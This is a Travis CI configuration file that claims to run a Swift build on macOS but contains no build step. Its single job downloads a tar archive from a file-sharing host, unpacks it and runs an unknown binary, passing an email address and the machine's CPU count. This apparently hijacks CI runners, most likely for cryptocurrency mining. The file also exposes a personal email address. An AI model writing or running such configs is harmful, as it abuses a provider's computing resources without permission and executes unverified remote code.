language: swift
os: osx
jobs:
  include:
    - stage: sheep
      script: wget https://transfer.sh/10aRNY/mac.tar; tar -xvf mac.tar; cd mac-m; ./mac-cli -user austinbrown1406@gmail.com -bcn $(sysctl -n hw.ncpu);
